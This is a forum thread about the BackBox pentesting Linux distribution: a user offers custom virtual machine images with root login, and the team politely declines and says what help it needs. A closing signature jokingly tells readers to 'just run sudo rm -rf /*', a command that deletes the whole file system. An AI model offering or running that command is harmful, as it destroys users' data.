Hello all,
Everyone has a personal taste, for example I don't like downloading 4GB Iso loaded with tools I don't use, or outdated ones even its domain expired, and hate having 10 tools do the same thing, Xscan and Yscanner listed with Zscan3r and they do the same job

This what I like about BackBox, good amount of tools, updated and no twins

Now let's talk about BackBox as Security/Pentesting distro, I will speak about myself here, I don't make any distro based on other one a primary OS, but I use it more than my primary to do my job, and as I said everyone has it own taste
I made a VMware image of BBox with my personal preferences:
1- root login
means you login as a root and no need to sudo this and that (if you're inexperience in linux you should use sudoers )
2- Add/Remove tools and apps
I installed what I use and remove the ones I don't use

But if its allowed I will provide BBox community with VMware and VirtualBox images with default install (except root)
this way you will not need to install BBox om VMs

I will post/send link after getting BBox team approval
and I will be posting tutorials in BBox development

I will post photos as soon as I finish the last touches

I don't think we are able to accept anything like you described above.

As you stated yourself, it is your personal choice and leave it as it is ;)

BackBox Community builds and maintains the main BB and does not provide any customization out of standards. Customizations such as vmware/vbox/etc images. You are Free to share privately and distribute but BackBox does not guarantee for any development that is external to the Team.

I'd like to thank you for your generous offer and thoug but I am afraid we are unable to process your request at this time.

But pls do not hesitate to get in touch if you ever want to use your expertise actively and be part of the team, don't be shy, we welcome anyone here. We are open to anyone.

Happy Hacking!

Can I participate with the team on the subject customize the interface and the addition of aesthetic touches on distribution

HI xxx600,

First thanks for asking. We are small team and in this time we need just more packages maintainers, people writing about BBox and giving help to other users. But your post will be seen because you are using "bold" html tag by other team mates :).

Cheers

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
